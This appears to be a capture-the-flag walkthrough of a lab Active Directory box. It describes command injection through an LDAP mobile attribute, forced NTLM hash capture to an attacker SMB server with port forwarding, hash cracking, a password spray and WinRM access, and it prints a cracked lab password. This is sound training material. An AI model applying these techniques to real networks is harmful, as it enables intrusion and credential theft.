Enumeration

root@webserver:~# ./nmap -T4 hope.windcorp.htb

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2025-02-13 06:05 CET
Unable to find nmap-services!  Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for hope.windcorp.htb (192.168.0.2)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (-0.010s latency).
Other addresses for hope.windcorp.htb (not scanned): 10.10.11.179
Not shown: 1148 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
53/tcp  open  domain
80/tcp  open  http
88/tcp  open  kerberos
389/tcp open  ldap
445/tcp open  microsoft-ds
464/tcp open  kpasswd
636/tcp open  ldaps
MAC Address: 00:15:5D:10:93:01 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 15.01 seconds

Enum as Ray.Duncan

SMB

  • Retrieves the Current User’s AD Information

    • It uses the ADSystemInfo COM object to get the Distinguished Name (DN) of the currently logged-in user.

    • Then, it binds to the user's Active Directory (AD) object using LDAP.

  • Creates a Simple Windows Form (GUI)

    • A small popup window appears titled "SMS password reset setup".

    • The form tells the user they need to keep their mobile number updated for password resets.

    • It has a text box pre-filled with the user's current mobile number (from AD).

    • Two buttons:

      • OK → Saves the new number to AD.

      • Cancel → Closes the form without saving.

  • Updates the User’s Mobile Number in AD

    • If the user clicks OK, the script updates the "mobile" attribute in AD with the new value.

  • The script runs on Windows, and it needs to be executed with Active Directory permissions (i.e., an account that has write access to modify AD user attributes).

  • Uses Windows Forms (System.Windows.Forms) to create the GUI.

  • Uses COM Objects (ADSystemInfo) to fetch user details.

Command Injection - LDAPmodify

Now we can try binding to LDAP ourselves and modify the "mobile" attribute of ray.duncan user.

So that's DC=windcorp,DC=htb.

We need the DN for ray.duncan:

We see there is a mobile number at the end.

We can now user ldapmodify to alter the mobile number for Ray Duncan.

Checking it again we see

We saw some entries in the WC-Share debug-users.txt file where we had usernames and numbers. So going back to check on it:

We see that it changed. We can assume that there is a PowerShell script running which is periodically reading and querying the LDAP for phone numers for debugging reasons. What if we give it a command instead of phone number?

Replacing number with $(whoami). We are essentially injecting code into the LDAP attributes. Hoping that when the ps script pulls it to write in the debug-users.txt, it executes our code. Right now the LDAP attribute looks like this after modification

Sure enough we get this

It runs as windcorp\scriptrunner.

Next step would be to try to get it run a shell command to give us a reverse shell.

First way

Unfortunately, this box might be running under PowerShell Constrained Language, which is a dumb down version of PS that won't allow us to run commands like New-Object which is needed to get reverse shell. We can confirm it by running this command on PowerShell:

So injecting it into LDAP:

Checking inside the debug-users.txt

Second way

Can we make it leak the NTLM hash? I start and SMB server on my machine

The command to inject (keeping in my the escape characters)

Which makes it

We do get connections but no credentials.

Reason

By default, smbclient tries to use NTLMv2 to authenticate to the SMB server.

This AD restricts NTLM handshake to non-domain joined machines. Which means the IP address here won't work we need the FQDN. luckily our linux machine is domain joined and it has FQDN webserver.windcorp.htb.

  • Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers

    • Controls whether NTLM credentials can be sent to remote servers. Setting this to “Deny” prevents sending NTLM to non-domain targets (or targets lacking a proper SPN).

  • Network security: Restrict NTLM: Incoming NTLM traffic

    • Governs which NTLM authentication attempts are accepted by the local machine. This can restrict NTLM logons coming into the system.

  • Network security: LAN Manager authentication level

    • Determines which authentication protocols (NTLMv1, NTLMv2, or LM) are used. For example, setting it to “Send NTLMv2 response only; Refuse LM & NTLM” forces the use of NTLMv2 (or Kerberos, if available).

  • Network security: Restrict NTLM: Audit NTLM authentication in this domain

    • Enables auditing of NTLM usage so you can see which accounts or systems are using NTLM authentication.

We can confirm our hostname

Work around

Running smbserver.py opens TCP port 445 on our machine.

When the Get-Content is run on the Windows machine we have to give it the linux machines FQDN so it sends the creds for handshake to Linux VM's port 445, and we will forward it to our machines port 445.

Query should look like this

And port forward

It didn't work at first. Our Linux machine should be listening on 192.168.0.100 port 445 and not just localhost:

Should be 192.168.0.100:445 instead of 127.0.0.1:445.

On far right we see that its an sshd configuration. So we can open /etc/ssh/sshd_config file and edit it making

And then restarting the server

That fixes it. Dont forget to enable -R forwarding again

We immediately get a hash. Cracking it with hashcat

scriptrunner:!@p%i&J#iNNo1T2

This user doesnt give us any extra privs.

Password Spray

But we do have a password that we can use against usernames. First we need to enumerate usernames.

Now I couldn't run kerbrute with proxychains so I had to get the binary and run it on the vm

We find that this password is valid for Bob.Wood.

WinRM as Bob

Finally we can winRM into the DC with its ticket after requesting it with kinit.

Again we see that its on CLM.

PreviousActive DirectoryNextDC PrivEsc

Last updated